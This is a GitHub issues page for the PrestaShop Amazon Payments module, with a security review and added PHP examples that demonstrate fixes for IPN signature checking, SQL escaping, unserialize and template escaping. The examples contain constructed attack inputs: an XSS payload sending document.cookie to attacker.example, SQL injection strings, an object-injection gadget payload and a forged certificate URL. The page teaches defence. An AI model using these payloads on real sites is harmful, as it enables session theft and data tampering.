prestashopcorp / amzpayments
Amazon Payments module

PHP 81.55% HTML 1.45% CSS 0.61% JavaScript 5.79% Smarty 10.60%
obsolete payment-module prestashop-module

amzpayments's People

Contributors: julienbourdeau, mmoustai, paeddl, quetzacoalt91

amzpayments's Issues

security review

We didn't fully check the payment validation flow; we need testing credentials.

IPN security

https://github.com/PrestaShop/amzpayments/blob/dev/ipn.php#L51

It looks like there is no access control on ipn.php: everybody is able to submit a "PaymentAuthorize" message.

If ipn.php is meant to only receive notifications from the Amazon merchant service/gateway, then the messages should be signed or authenticated so we can be sure the message comes from a trusted source and can't be altered.
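
One way to close the gap described in this issue, as an added example that is not the module's code: Amazon Pay delivers IPNs as Amazon SNS notifications, whose `Signature` field is an RSA signature over a canonical string of the message fields, made with the key whose certificate is published at `SigningCertURL`. The field order, the `https://sns.<region>.amazonaws.com` host rule and the SHA1/SHA256 choice by `SignatureVersion` follow the SNS verification procedure. To run offline, a key pair generated in the script stands in for Amazon's certificate, and the message IDs, topic ARN and notification body are constructed.

```php
<?php
// Added example, not the module's code: accept an IPN POST only after proving it came
// from Amazon. The Signature covers a canonical string of the fields listed below.

// Fields covered by the signature for a Notification, in the order SNS requires.
const SNS_SIGNED_FIELDS = ['Message', 'MessageId', 'Subject', 'Timestamp', 'TopicArn', 'Type'];

function snsCanonicalString(array $msg): string
{
    $out = '';
    foreach (SNS_SIGNED_FIELDS as $key) {
        if (isset($msg[$key])) {            // Subject is optional and simply skipped
            $out .= $key . "\n" . $msg[$key] . "\n";
        }
    }
    return $out;
}

// The certificate must be fetched over TLS from an SNS host. Without this check an
// attacker sets SigningCertURL to their own server and "verifies" their own forgery.
function snsCertUrlIsTrusted(string $url): bool
{
    $p = parse_url($url);
    return is_array($p)
        && ($p['scheme'] ?? '') === 'https'
        && preg_match('/^sns\.[a-z0-9-]+\.amazonaws\.com$/', $p['host'] ?? '') === 1
        && substr($p['path'] ?? '', -4) === '.pem';
}

// $certPem: the PEM certificate downloaded from SigningCertURL (after
// snsCertUrlIsTrusted() passed) and cached. SignatureVersion 1 is SHA1, 2 is SHA256.
function snsSignatureValid(array $msg, string $certPem): bool
{
    if (!isset($msg['Signature'], $msg['SignatureVersion'])) {
        return false;                       // unsigned POSTs are rejected, never processed
    }
    $pub = openssl_pkey_get_public($certPem);
    $sig = base64_decode($msg['Signature'], true);
    if ($pub === false || $sig === false) {
        return false;
    }
    $algo = $msg['SignatureVersion'] === '2' ? OPENSSL_ALGO_SHA256 : OPENSSL_ALGO_SHA1;
    return openssl_verify(snsCanonicalString($msg), $sig, $pub, $algo) === 1;
}

// What ipn.php would do first, before touching the database or any order.
// A real handler answers the rejected case with HTTP 403 and stops.
function handleIpn(array $post, string $certPem, string $expectedTopicArn): string
{
    if (!snsCertUrlIsTrusted($post['SigningCertURL'] ?? '')
        || !snsSignatureValid($post, $certPem)
        || ($post['TopicArn'] ?? '') !== $expectedTopicArn) {
        return 'rejected';
    }
    $body = json_decode($post['Message'], true);
    return 'accepted: ' . ($body['NotificationType'] ?? '?');
}

// --- Constructed demo. A key pair generated here stands in for Amazon's signing
// certificate; the message ID, topic ARN and notification body are made up.
$priv = openssl_pkey_new(['private_key_bits' => 2048, 'private_key_type' => OPENSSL_KEYTYPE_RSA]);
$csr  = openssl_csr_new(['commonName' => 'sns-stand-in.example'], $priv);
$cert = openssl_csr_sign($csr, null, $priv, 1);
openssl_x509_export($cert, $certPem);

$topic = 'arn:aws:sns:us-east-1:000000000000:amazon-pay-ipn';
$ipn = [
    'Type'             => 'Notification',
    'MessageId'        => '11111111-2222-3333-4444-555555555555',
    'TopicArn'         => $topic,
    'Message'          => '{"NotificationType":"PaymentAuthorize","NotificationData":"<AuthorizationNotification/>"}',
    'Timestamp'        => '2015-10-22T12:00:00.000Z',
    'SignatureVersion' => '2',
    'SigningCertURL'   => 'https://sns.us-east-1.amazonaws.com/SimpleNotificationService-stand-in.pem',
];
openssl_sign(snsCanonicalString($ipn), $sig, $priv, OPENSSL_ALGO_SHA256);
$ipn['Signature'] = base64_encode($sig);

echo handleIpn($ipn, $certPem, $topic), "\n";            // genuine, signed notification

$forged = $ipn;                                           // body changed after signing
$forged['Message'] = '{"NotificationType":"PaymentCapture","NotificationData":"<CaptureNotification/>"}';
echo handleIpn($forged, $certPem, $topic), "\n";

unset($forged['Signature']);                              // the unsigned POST anyone can send today
echo handleIpn($forged, $certPem, $topic), "\n";

$forged = $ipn;                                           // certificate pointed at an attacker host
$forged['SigningCertURL'] = 'https://attacker.example/sns.pem';
echo handleIpn($forged, $certPem, $topic), "\n";
```

The signature only proves origin and integrity of one message. A production handler should also reject stale `Timestamp` values and remember processed `MessageId`s, otherwise a captured genuine notification can be replayed to re-trigger the same status change.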

SQL issue

https://github.com/PrestaShop/amzpayments/blob/dev/controllers/front/amzpayments.php#L404 escape $sql_arr variables with pSQL or (int) before db->insert()

https://github.com/PrestaShop/amzpayments/blob/dev/amzpayments.php#L308 pSQL($this->name)
https://github.com/PrestaShop/amzpayments/blob/dev/amzpayments.php#L335 pSQL($this->name)
https://github.com/PrestaShop/amzpayments/blob/dev/amzpayments.php#L363 bqSQL($table) pSQL($column)
https://github.com/PrestaShop/amzpayments/blob/dev/amzpayments.php#L1636 pSQL((string) $details->getRefundStatus()->getState())
https://github.com/PrestaShop/amzpayments/blob/dev/amzpayments.php#L1657 pSQL((string) $details->getCaptureStatus()->getState())
https://github.com/PrestaShop/amzpayments/blob/dev/amzpayments.php#L1693 pSQL((string) $details->getAuthorizationStatus()->getState())
https://github.com/PrestaShop/amzpayments/blob/dev/amzpayments.php#L1723 pSQL((string) $details->getOrderReferenceStatus()->getState())
https://github.com/PrestaShop/amzpayments/blob/dev/amzpayments.php#L1941 pSQL($this->capture_status_id)
https://github.com/PrestaShop/amzpayments/blob/dev/classes/AmazonTransactions.php#L81 escape $sql_arr variables with pSQL or (int) before db->insert()
https://github.com/PrestaShop/amzpayments/blob/dev/classes/AmazonTransactions.php#L119 escape $sql_arr variables with pSQL or (int) before db->insert()
https://github.com/PrestaShop/amzpayments/blob/dev/classes/AmazonTransactions.php#L158 escape $sql_arr variables with pSQL or (int) before db->insert()
https://github.com/PrestaShop/amzpayments/blob/dev/classes/AmazonTransactions.php#L269 pSQL($type)
https://github.com/PrestaShop/amzpayments/blob/dev/classes/AmazonTransactions.php#L356 pSQL($oid)
https://github.com/PrestaShop/amzpayments/blob/dev/classes/AmazonTransactions.php#L357 pSQL($status)

https://github.com/PrestaShop/amzpayments/blob/dev/ipn.php#L59 pSQL((string) $response_xml->AuthorizationDetails->AuthorizationStatus->State)
https://github.com/PrestaShop/amzpayments/blob/dev/ipn.php#L81 pSQL((string) $response_xml->CaptureDetails->CaptureStatus->State)
https://github.com/PrestaShop/amzpayments/blob/dev/ipn.php#L101 pSQL((string) $response_xml->RefundDetails->RefundStatus->State)
https://github.com/PrestaShop/amzpayments/blob/dev/ipn.php#L114 pSQL((string) $response_xml->OrderReference->OrderReferenceStatus->State)
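
The fix the list above asks for, as an added example that is not the module's code: declare a type per column once, then run every `$sql_arr` through a sanitizer that casts numeric columns and applies `pSQL()` to strings before `Db::getInstance()->insert()`, which quotes values but does not escape them. Inside PrestaShop `pSQL()` and `bqSQL()` come from `config/alias.php`; the stand-ins below exist only so the script runs outside the shop and mimic just the escaping part of the real functions. The table name, column names and hostile input are constructed.

```php
<?php
// Added example, not the module's code: escape values before they reach
// Db::getInstance()->insert(). The stand-ins mimic the escaping part of PrestaShop's
// pSQL()/bqSQL() (the real pSQL() also strips HTML unless told otherwise).
if (!function_exists('pSQL')) {
    function pSQL(string $s): string { return addcslashes($s, "\\'\"\0\n\r\x1a"); }
}
if (!function_exists('bqSQL')) {
    function bqSQL(string $s): string { return str_replace('`', '\`', pSQL($s)); }
}

// Apply the declared type of each column. Keys not in the type map are dropped, so an
// attacker-controlled array key can never become a column name in the query.
function sanitizeRow(array $row, array $types): array
{
    $clean = [];
    foreach ($types as $column => $type) {
        if (!array_key_exists($column, $row)) {
            continue;
        }
        switch ($type) {
            case 'int':   $clean[$column] = (int) $row[$column]; break;
            case 'float': $clean[$column] = (float) $row[$column]; break;
            case 'bool':  $clean[$column] = (int) (bool) $row[$column]; break;
            default:      $clean[$column] = pSQL((string) $row[$column]);
        }
    }
    return $clean;
}

// Identifiers cannot be escaped into safety the way values can: refuse anything that
// is not a declared column, and only then apply bqSQL() for the backticks.
function safeColumn(string $column, array $types): string
{
    if (!array_key_exists($column, $types)) {
        throw new InvalidArgumentException('Unknown column: ' . $column);
    }
    return bqSQL($column);
}

// Illustrative column types for a transactions table (not the module's schema).
const AMZ_TX_TYPES = [
    'id_order'                => 'int',
    'amazon_transaction_id'   => 'string',
    'amazon_transaction_type' => 'string',
    'status'                  => 'string',
    'amount'                  => 'float',
];

// Constructed hostile input: the status field tries to close the quoted value and
// append a second row; id_order carries a tautology; is_admin is an extra key.
$sql_arr = [
    'id_order'                => '42 OR 1=1',
    'amazon_transaction_id'   => 'S02-1234567-7654321-A000001',
    'amazon_transaction_type' => 'authorize',
    'status'                  => "Open'), ('1','x','x','Closed",
    'amount'                  => '12.50',
    'is_admin'                => 1,
];

$clean = sanitizeRow($sql_arr, AMZ_TX_TYPES);
print_r($clean);

// Inside the module this is the only thing that should reach the database layer:
// Db::getInstance()->insert('amz_transactions', $clean);

// An unknown identifier is refused instead of being interpolated.
try {
    safeColumn('status; DROP TABLE ps_orders', AMZ_TX_TYPES);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
echo safeColumn('status', AMZ_TX_TYPES), "\n";
```

The same sanitizer serves the `update()` calls and the hand-written `WHERE` clauses in the list: cast the integer IDs, `pSQL()` the status strings coming back from Amazon's API objects, and treat table and column names as a fixed whitelist rather than data.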

serialize / unserialize

Please replace all the following calls to serialize/unserialize with json_encode/json_decode.

If you can't, please use Tools::unSerialize() instead of unserialize()

https://github.com/PrestaShop/amzpayments/blob/dev/classes/AmazonTransactions.php#L304
https://github.com/PrestaShop/amzpayments/blob/dev/classes/AmazonTransactions.php#L306
https://github.com/PrestaShop/amzpayments/blob/dev/classes/AmazonTransactions.php#L308
https://github.com/PrestaShop/amzpayments/blob/dev/classes/AmazonTransactions.php#L321
https://github.com/PrestaShop/amzpayments/blob/dev/classes/AmazonTransactions.php#L322
https://github.com/PrestaShop/amzpayments/blob/dev/classes/AmazonTransactions.php#L324
https://github.com/PrestaShop/amzpayments/blob/dev/classes/AmazonTransactions.php#L337
https://github.com/PrestaShop/amzpayments/blob/dev/classes/AmazonTransactions.php#L338
https://github.com/PrestaShop/amzpayments/blob/dev/classes/AmazonTransactions.php#L340

https://github.com/PrestaShop/amzpayments/blob/dev/controllers/front/amzpayments.php#L648
https://github.com/PrestaShop/amzpayments/blob/dev/controllers/front/amzpayments.php#L657
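
Why this matters, as an added example that is not the module's code: `unserialize()` instantiates whatever class the input names and runs its magic methods, so any serialized string an attacker can influence (a cookie, a database column written from request data) becomes object injection. The gadget class, the file path and the stored details below are constructed; the JSON functions are the replacement the issue asks for, and `allowed_classes => false` (PHP 7.0 and later) is the fallback when the stored format cannot change, which is also what PrestaShop's `Tools::unSerialize()` is for.

```php
<?php
// Added example, not the module's code: unserialize() on untrusted bytes versus
// json_decode(), demonstrated with a constructed gadget class.

// A class with a magic method is all an attacker needs. This one is constructed for
// the demo; in a real shop any autoloadable core or vendor class with __destruct()
// or __wakeup() is a candidate gadget.
class TempFileCleaner
{
    public $path;

    public function __destruct()
    {
        // Also runs for objects that unserialize() built from attacker-supplied bytes.
        if (is_string($this->path) && is_file($this->path)) {
            unlink($this->path);
        }
    }
}

// Vulnerable pattern: the stored string is handed to PHP's native format.
function loadDetailsUnsafe(string $stored)
{
    return unserialize($stored);
}

// Fix the issue asks for: JSON cannot describe PHP objects, so nothing is instantiated.
function saveDetails(array $details): string
{
    return json_encode($details);
}

function loadDetails(string $stored): array
{
    $data = json_decode($stored, true);      // true: associative arrays, never objects
    return is_array($data) ? $data : [];
}

// Fallback when the stored format cannot change (PHP >= 7.0): objects become
// __PHP_Incomplete_Class, whose destructor does nothing.
function loadDetailsNoObjects(string $stored)
{
    return unserialize($stored, ['allowed_classes' => false]);
}

// Constructed attack payload: a serialized TempFileCleaner aimed at $path, placed
// wherever the module keeps its serialized details (cookie, DB column, ...).
function gadgetPayload(string $path): string
{
    return 'O:15:"TempFileCleaner":1:{s:4:"path";s:' . strlen($path) . ':"' . $path . '";}';
}

$details = ['order_ref' => 'S02-1234567-7654321', 'state' => 'Open'];   // what the module means to store

$victim = tempnam(sys_get_temp_dir(), 'amz');
$obj = loadDetailsUnsafe(gadgetPayload($victim));    // object built from attacker bytes ...
unset($obj);                                          // ... __destruct() fires and removes $victim
printf("unserialize(): file still exists? %s\n", var_export(is_file($victim), true));

$victim = tempnam(sys_get_temp_dir(), 'amz');
$obj = loadDetailsNoObjects(gadgetPayload($victim));  // incomplete class, destructor never runs
unset($obj);
printf("allowed_classes=false: file still exists? %s\n", var_export(is_file($victim), true));
unlink($victim);

printf("json round-trip intact? %s\n", var_export(loadDetails(saveDetails($details)) === $details, true));
printf("json_decode() on the payload: %s\n", var_export(loadDetails(gadgetPayload($victim)), true));
```

File deletion is the mildest outcome; with a richer gadget chain in the shop's autoload path the same input path leads to file writes or code execution, which is why switching the format beats filtering the input.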

smarty template escaping

In the following templates, the variables aren't escaped; it is recommended to always escape variables with |escape:'htmlall'

https://github.com/PrestaShop/amzpayments/blob/dev/views/templates/admin/configuration.tpl
https://github.com/PrestaShop/amzpayments/blob/dev/views/templates/admin/order_actions.tpl
https://github.com/PrestaShop/amzpayments/blob/dev/views/templates/admin/order_history.tpl
https://github.com/PrestaShop/amzpayments/blob/dev/views/templates/admin/order_summary.tpl
https://github.com/PrestaShop/amzpayments/blob/dev/views/templates/admin/skeleton.tpl
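
What the missing modifier means for the back office, as an added example that is not the module's code: the same variable rendered raw and with `|escape:'htmlall'` from a string template. The hostile value and variable name are constructed; the script assumes Smarty 3 can be loaded from `tools/smarty/Smarty.class.php`, which is where PrestaShop 1.6 ships it, but that path is an assumption for running this outside the shop.

```php
<?php
// Added example, not the module's code: stored XSS in an admin template versus the
// escaped form. Smarty location is an assumption (PrestaShop 1.6 bundles it there).
require_once __DIR__ . '/tools/smarty/Smarty.class.php';

$smarty = new Smarty();
$smarty->setCompileDir(sys_get_temp_dir());

// Constructed hostile value: text the merchant never wrote (a buyer-supplied field or
// a reason string relayed from the payment provider) that ends up on the order page.
$smarty->assign('amz_status_reason',
    '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">');

// The pattern found in the listed templates: raw interpolation, so the payload is
// live HTML running in the logged-in administrator's browser.
$raw = $smarty->fetch('string:<td>{$amz_status_reason}</td>');

// What the review asks for: escape at the point of output, charset made explicit.
// htmlall is htmlentities(), so <, >, quotes and & all become entities.
$safe = $smarty->fetch('string:<td>{$amz_status_reason|escape:\'htmlall\':\'UTF-8\'}</td>');

echo "unescaped: ", $raw, "\n";
echo "escaped:   ", $safe, "\n";
```

Escaping belongs in the template at each output point rather than on the value when it is stored, since the same string may later be placed in a JavaScript block or an attribute, where `htmlall` is not the right escape.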

Front end comments

Back office

[Screenshot from 2015-10-22 14:14:15]
On the configuration page, your warning message is displayed even though I have the proper version (1.6.1.1 here). But be careful: the potential number of merchants using your module will be greatly limited if you keep this restriction on the PrestaShop version.

Here is a suggestion if you want a solution for the older versions, which can replace hookActionCustomerLogoutAfter:

public function hookDisplayHeader($params)
{
    [...]

    // Core versions before 1.6.1.1 have no hookActionCustomerLogoutAfter, so drop the
    // Amazon session cookies here whenever the customer is no longer logged in.
    // version_compare() takes the operator as a string: '<', not a bare <.
    if (version_compare(_PS_VERSION_, '1.6.1.1', '<') // This test can even be removed if you want
        && isset($this->context->cookie->amz_access_token)
        && !$this->context->customer->isLogged())
    {
        unset($this->context->cookie->amz_access_token);
        unset($this->context->cookie->amazon_id);
        unset($this->context->cookie->amz_js_string);
    }

    [...]
}

Front office

[Screenshot from 2015-10-22 11:49:10]

On this page, it would be great to have the whole button clickable, like we can do with the other payment options.

General comments after code review

Hi,

I have just checked the main class of the module and there are many points to fix:

  • In the install() function, do NOT alter core tables, because it can cause issues during PrestaShop upgrades. Please create another table for your columns, joined by the order id or customer id.
  • HTML code must not be generated in the PHP files. In order to respect the MVC architecture, it must be moved to the tpl files. Your PHP code will be much lighter.
  • Even if the module is supposed to be published for only one country, it must be written in English. Then you can translate it into your favorite languages with the translation functionality of PrestaShop.

Because fixing these points will change a whole part of your code, I'll wait for them to be fixed before going further in the code review.
However, I'll do a functional test later.

Best regards

Popup with error


Module version: 2.0.57
Prestashop version: 1.6.1.11

The checkout button is deactivated; when it is force-enabled, the warning enclosed above appears. Customers cannot place orders.

List of open points that need to be clarified

We are facing the following issues:

  1. We cannot add a box with text and a "Login with Amazon" button to the authentication page, since there are no hooks available. However, to make this a convenient integration for merchants, we need this.
  2. Code optimization changes the order of two JS snippets that normally should be in the header and must be in the right order. (This one might be fixed by Patrick.) But anyway, how could we avoid this re-ordering?
  3. We might get into trouble when jQuery in the shop is loaded before the Amazon Payments widgets.js, because then those parts that need the jQuery version loaded by the shop might not work correctly.
  4. The module generates URLs that merchants have to enter in their Amazon accounts to whitelist them. This URL contains the path to the module directory. While it's retrieved by means of PrestaShop methods, it also shows the path "modules" while in fact the path "module" would be correct.
  5. When uninstalling the old plugin, the overrides are not removed correctly, which causes errors when installing the new one afterwards.
  6. Overrides are often not generated correctly; merchants have to delete the file class_index.php in the cache folder in order to regenerate them.

Regards
Bernd.

Module already in Prestashop?

Is this the same module currently included in Prestashop?

I ran into an issue with that module not recording any transactions with Google Analytics (other payment modules do so fine), so I'm curious if this one is worth a try or if the Prestashop included one is the latest version of this.

Overrides

The module uses overrides, but since it's a partner module that's forbidden.

why is jquery "hard" loaded again from cdn on every page?

In the hookDisplayHeader() method jQuery 1.12 is being hard-loaded again even though $this->context->controller->addJquery(); is called right at the beginning of the function. Removing the string that loads jQuery 1.12 results in "jQuery is not a function" errors and the button not appearing.

My issue with this is the unnecessary extra load time, especially since it is loaded on every page (i.e. landing pages where speed matters and Amazon Pay does not need to be loaded at all), and the jQuery CDN is unreliable (regarding speed...).

I realize I can exclude the module from the header hook for index, category and product pages through the PrestaShop "positions" tool but would like a less "workaroundy" solution. Thanks for the otherwise great module!
